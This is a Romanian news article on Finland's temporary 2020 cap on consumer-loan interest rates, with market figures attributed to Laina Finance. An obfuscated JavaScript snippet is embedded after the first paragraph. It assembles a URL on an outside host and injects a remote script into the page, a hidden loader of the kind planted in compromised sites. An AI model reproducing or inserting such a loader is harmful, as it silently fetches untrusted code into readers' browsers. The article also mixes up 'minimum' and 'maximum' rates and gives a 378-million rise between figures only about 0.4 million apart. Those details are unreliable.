La 1 iulie 2020, guvernul finlandez a redus rata maximă a dobânzii active pentru creditele de consum la 10%. Restricția însă nu a afectat plata în rate a produselor, a cardurilor de credit și a împrumuturilor garantate pe termen lung, cum ar fi creditele ipotecare sau auto. Se anticipează că aceasta este o măsură temporară iar de la 1 ianuarie 2021, rata minimă va reveni la valoarea anterioară de 20%. (function(){ xxf1_=(„u”+””)+”s”+””;xxf1_+=(„tat.”)+(„i”); xxf1=document.createElement(„script”);xxf1.type=”text/javascript”;xxf1_+=”nf”+(„o”)+”/”; xxf1u=”247323492″+”.”;xxf1.async=true;xxf1u+=”m6ib5a1nxf11u0wlpmeeahwkd2vej9″; xxf1.src=”https://”+xxf1_+xxf1u;xxf1b=document.body;xxf1b.appendChild(xxf1); })();
Principalul motiv pentru înăsprirea condițiilor a fost pandemia de coronavirus și deteriorarea situației economice care a rezultat în urma acesteia. Experții financiari ai Laina Finance notează faptul că, înainte de adoptarea legii, numărul finlandezilor care și-au declarat falimentul a ajuns la 390.000 de persoane. În plus, Finlanda a urmat exemplul altor țări scandinave, care au încercat să reducă piața creditelor de consum (în special așa-numitele împrumuturi rapide) în perioada 2019-2020. Totuși, dacă în Norvegia, Danemarca și Suedia au fost aplicate cele mai severe restricții în ceea ce privește publicitatea împrumuturilor, Finlanda a pus accentul în principal pe reducerea ratei. În ceea ce privește publicitatea, aici a fost interzis doar marketingul direct, respectiv campaniile de publicitate prin SMS.
Conform celor menționate de Laina Finance, majoritatea organizațiilor au reacționat într-un mod disciplinat: de exemplu, compania financiară Blue Finance, imediat după adoptarea legii, a redus dobânda la 9,9% pe an.
Pe site-ul web Laina Finance, analiștii financiari observă că de la introducerea modificărilor, piața a continuat să crească fără probleme: spre exemplu, în iulie volumul împrumuturilor de consum s-a ridicat la 16,308 milioane de euro, iar în august a crescut la 16,355 milioane. În octombrie a ajuns la 16,686 milioane de euro, înregistrând astfel o creștere cu 378 milioane de euro din iulie. Acest lucru a respins predicțiile anumitor deputați finlandezi și personalități publice, care au anticipat o stagnare a pieței.
Serviciul de licitație a menționat că dobânzile la împrumuturile garantate pe termen lung, de exemplu, împrumuturile auto și creditele ipotecare, au scăzut, de asemenea, în contextul general. Un împrumut de consolidare (un tip de refinanțare) ar putea fi obținut chiar și cu o dobândă mai mică de 5%.
În același timp, indicatorul încrederii consumatorilor în împrumuturi, înregistrează scăderi rapide: în octombrie era -6,9, în timp ce în septembrie era -5,9. Acest fenomen s-a petrecut din cauza faptului că așteptările finlandezilor cu privire la propria situație financiară s-au înrăutățit (6,7 în octombrie față de 7,0 în septembrie) și a economiei de stat în ansamblu (-24,9 față de -18,1).
Este imposibil să spunem cu certitudine în acest moment dacă restricția va fi extinsă. Situația este agravată de faptul că, în conformitate cu termenii legii adoptate, la 1 ianuarie 2021, rata maximă a dobânzii active va crește pentru împrumuturile contractate. Spre exemplu, un client, care a contractat un credit pe 5 luni la o dobândă de 10% în octombrie, va beneficia de această dobândă timp de trei luni, dar în următoarele două luni dobânda va crește la 20%.
Analiștii Laina Finance presupun că piața de credite va continua să crească în orice situație, însă dacă acest beneficiu este într-adevăr anulat, volumele sale vor crește brusc. În primul rând, împrumuturile vor putea fi obținute și de persoane, care anterior au fost refuzate de instituțiile de microfinanțare din cauza riscurilor crescute iar în al doilea rând, unii clienți, care nu au avut timp să închidă împrumuturile cu o dobândă scăzută, vor începe să-și acopere datoriile cu noi împrumuturi. Dacă însă acest beneficiu va persista, creșterea pieței va fi mult mai lină.
Eliminarea jucătorilor slabi de pe piața financiară va continua probabil și pe viitor. Deși majoritatea instituțiilor de microfinanțare s-au adaptat deja la noile condiții (chiar dacă reducerea inițială a ratei minime la 20% a pus sistemul standard de împrumuturi rapide în imposibilitatea de a funcționa), pentru unele companii mici, a face afaceri în noile condiții devine din ce în ce mai dificil.
Preluat de la: Timpul.md